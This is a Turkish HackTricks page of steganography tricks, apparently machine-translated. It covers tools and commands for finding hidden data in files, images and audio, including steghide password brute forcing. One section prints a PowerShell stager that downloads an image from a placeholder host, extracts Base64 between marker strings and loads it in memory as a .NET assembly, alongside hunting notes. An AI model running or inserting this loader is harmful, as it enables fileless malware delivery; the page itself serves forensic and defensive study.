Stego Hileleri
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking’i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Dosyalardan Veri Çıkarma
Binwalk
Gömülü gizli dosyaları ve verileri aramak için binary dosyaları tarayan bir araç. apt ile kurulur ve kaynağı GitHub üzerinde mevcuttur.
binwalk file # Displays the embedded data
binwalk -e file # Extracts the data
binwalk --dd ".*" file # Extracts all data
Foremost
Dosyaları başlık ve sonlarına göre kurtarır, png görüntüler için kullanışlıdır. apt ile kurulur; kaynağı GitHub üzerindedir.
foremost -i file # Extracts data
Exiftool
Dosya meta verilerini görüntülemeye yardımcı olur, here adresinden ulaşılabilir.
exiftool file # Shows the metadata
Exiv2
exiftool’a benzer; meta verileri görüntülemek için kullanılır. apt üzerinden kurulabilir, kaynak kodu GitHub üzerinde bulunur ve bir official website vardır.
exiv2 file # Shows the metadata
Dosya
İşlemekte olduğunuz dosya türünü belirleyin.
Strings
Çıktıyı filtrelemek için çeşitli kodlama ayarlarını kullanarak dosyalardan okunabilir dizeleri çıkarır.
strings -n 6 file # Extracts strings with a minimum length of 6
strings -n 6 file | head -n 20 # First 20 strings
strings -n 6 file | tail -n 20 # Last 20 strings
strings -e s -n 6 file # 7bit strings
strings -e S -n 6 file # 8bit strings
strings -e l -n 6 file # 16bit strings (little-endian)
strings -e b -n 6 file # 16bit strings (big-endian)
strings -e L -n 6 file # 32bit strings (little-endian)
strings -e B -n 6 file # 32bit strings (big-endian)
Comparison (cmp)
Çevrimiçi bulunan orijinal sürümüyle değiştirilmiş bir dosyayı karşılaştırmak için kullanışlıdır.
cmp original.jpg stego.jpg -b -l
Metin İçindeki Gizli Verileri Çıkarma
Boşluklardaki Gizli Veriler
Görünüşte boş alanlardaki görünmez karakterler bilgi gizleyebilir. Bu verileri çıkarmak için şu adresi ziyaret edin [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder].
Görüntülerden Veri Çıkarma
GraphicMagick ile Görüntü Ayrıntılarını Belirleme
GraphicMagick görüntü dosyası türlerini belirlemek ve olası bozulmaları tespit etmek için kullanılır. Bir görüntüyü incelemek için aşağıdaki komutu çalıştırın:
./magick identify -verbose stego.jpg
Hasarlı bir görüntüyü onarmayı denemek için bir metadata comment eklemek yardımcı olabilir:
./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg
Steghide ile Veri Gizleme
Steghide, JPEG, BMP, WAV, and AU dosyalarının içine veri gizlemeyi sağlar; şifrelenmiş veriyi ekleyip çıkarabilir. Kurulum apt ile basittir ve kaynak kodu GitHub’da mevcuttur.
Komutlar:
steghide info filebir dosyanın gizli veri içerip içermediğini gösterir.steghide extract -sf file [--passphrase password]gizli veriyi çıkarır, parola isteğe bağlıdır.
Web tabanlı çıkarma için bu siteyi ziyaret edin.
Bruteforce Attack with Stegcracker:
- Steghide üzerinde parola kırma denemesi yapmak için aşağıdaki gibi stegcracker kullanın:
stegcracker <file> [<wordlist>]
zsteg için PNG ve BMP Dosyaları
zsteg, PNG ve BMP dosyalarındaki gizli verileri ortaya çıkarmada uzmanlaşır. Kurulum gem install zsteg ile yapılır, source on GitHub.
Komutlar:
zsteg -a filebir dosyada tüm tespit yöntemlerini uygular.zsteg -E fileveri çıkarmak için bir payload belirtir.
StegoVeritas ve Stegsolve
stegoVeritas metadata kontrolleri yapar, görüntü dönüşümleri uygular ve diğer özelliklerin yanı sıra LSB brute forcing uygular. Tüm seçenekler için stegoveritas.py -h kullanın ve tüm kontrolleri çalıştırmak için stegoveritas.py stego.jpg komutunu kullanın.
Stegsolve görüntüler içindeki gizli metinleri veya mesajları ortaya çıkarmak için çeşitli renk filtreleri uygular. Mevcut olduğu yer: GitHub.
FFT ile Gizli İçerik Tespiti
Fast Fourier Transform (FFT) teknikleri, görüntülerde gizlenmiş içeriği ortaya çıkarabilir. Yararlı kaynaklar şunlardır:
Stegpy için Ses ve Görüntü Dosyaları
Stegpy, PNG, BMP, GIF, WebP ve WAV gibi formatları destekleyerek görüntü ve ses dosyalarına bilgi gömülmesine izin verir. Mevcut olduğu yer: GitHub.
Pngcheck ile PNG Dosya Analizi
PNG dosyalarını analiz etmek veya gerçekliğini doğrulamak için şunu kullanın:
apt-get install pngcheck
pngcheck stego.png
Görüntü Analizi için Ek Araçlar
Daha fazla inceleme için şu kaynakları ziyaret edebilirsiniz:
Marker-delimited Base64 payloads görüntülere gizlenmiş (malware delivery)
Commodity loaders giderek Base64-encoded payload’ları geçerli görüntülerin içinde düz metin olarak gizliyor (çoğunlukla GIF/PNG). Pixel-level LSB yerine, payload dosya metni/metadata’sına gömülen benzersiz başlangıç/bitiş marker string’leriyle sınırlandırılır. A PowerShell stager then:
- Görüntüyü HTTP(S) üzerinden indirir
- Marker string’lerini bulur (gözlemlenen örnekler: <<sudo_png>> … <<sudo_odt>>)
- İki marker arasındaki metni çıkarır ve Base64 çözerek baytlara çevirir
- .NET assembly’sini hafızada yükler ve bilinen bir entry method’u çağırır (disk’e herhangi bir dosya yazılmaz)
Minimal PowerShell carving/loading snippet
$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}
Notlar
- Bu, ATT&CK T1027.003 (steganography) kapsamında yer alır. Marker string’leri kampanyalar arasında değişir.
- Hunting: indirilen görüntüleri bilinen ayırıcılar için tara;
DownloadString’i takibenFromBase64StringkullananPowerShellörneklerini işaretle.
Ayrıca phishing teslim örnekleri ve tam bellek içi çağrı akışına buradan bakın:
Seslerden Veri Çıkarma
Audio steganography ses dosyaları içinde bilgi gizlemek için benzersiz bir yöntem sunar. Gizli içeriği gömmek veya çıkarmak için farklı araçlar kullanılır.
Steghide (JPEG, BMP, WAV, AU)
Steghide, JPEG, BMP, WAV ve AU dosyalarına veri gizlemek için tasarlanmış çok yönlü bir araçtır. Detailed instructions are provided in the stego tricks documentation.
Stegpy (PNG, BMP, GIF, WebP, WAV)
Bu araç PNG, BMP, GIF, WebP ve WAV dahil çeşitli formatlarla uyumludur. Daha fazla bilgi için refer to Stegpy’s section.
ffmpeg
ffmpeg, ses dosyalarının bütünlüğünü değerlendirmek, ayrıntılı bilgi sağlamak ve herhangi bir tutarsızlığı tespit etmek için önemlidir.
ffmpeg -v info -i stego.mp3 -f null -
WavSteg (WAV)
WavSteg, en düşük anlamlı bit (LSB) stratejisini kullanarak WAV dosyaları içinde veri gizleme ve çıkarma konusunda başarılıdır. GitHub üzerinde mevcuttur. Komutlar şunlardır:
python3 WavSteg.py -r -b 1 -s soundfile -o outputfile
python3 WavSteg.py -r -b 2 -s soundfile -o outputfile
Deepsound
Deepsound, ses dosyaları içinde AES-256 kullanarak bilgi şifreleme ve tespitine olanak tanır. the official page üzerinden indirilebilir.
Sonic Visualizer
Ses dosyalarının görsel ve analitik incelemesi için paha biçilmez bir araç olan Sonic Visualizer, diğer yollarla tespit edilemeyen gizli öğeleri ortaya çıkarabilir. Daha fazla bilgi için official website adresini ziyaret edin.
DTMF Tones - Dial Tones
Ses dosyalarında DTMF tonlarını tespit etmek, this DTMF detector ve DialABC gibi çevrimiçi araçlarla yapılabilir.
Diğer Teknikler
Binary Length SQRT - QR Code
Karekökü tam sayı olan ikili veri bir QR code olabilir. Bunu kontrol etmek için şu kod parçasını kullanın:
import math
math.sqrt(2500) #50
İkili (binary) veriyi görüntüye dönüştürmek için dcode’a bakın. QR kodlarını okumak için this online barcode reader kullanın.
Braille Çevirisi
Braille’i çevirmek için, Branah Braille Translator mükemmel bir kaynaktır.
Kaynaklar
- https://0xrick.github.io/lists/stego/
- https://github.com/DominicBreuker/stego-toolkit
- Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers
- MITRE ATT&CK – Steganography (T1027.003)
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking’i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
HackTricks

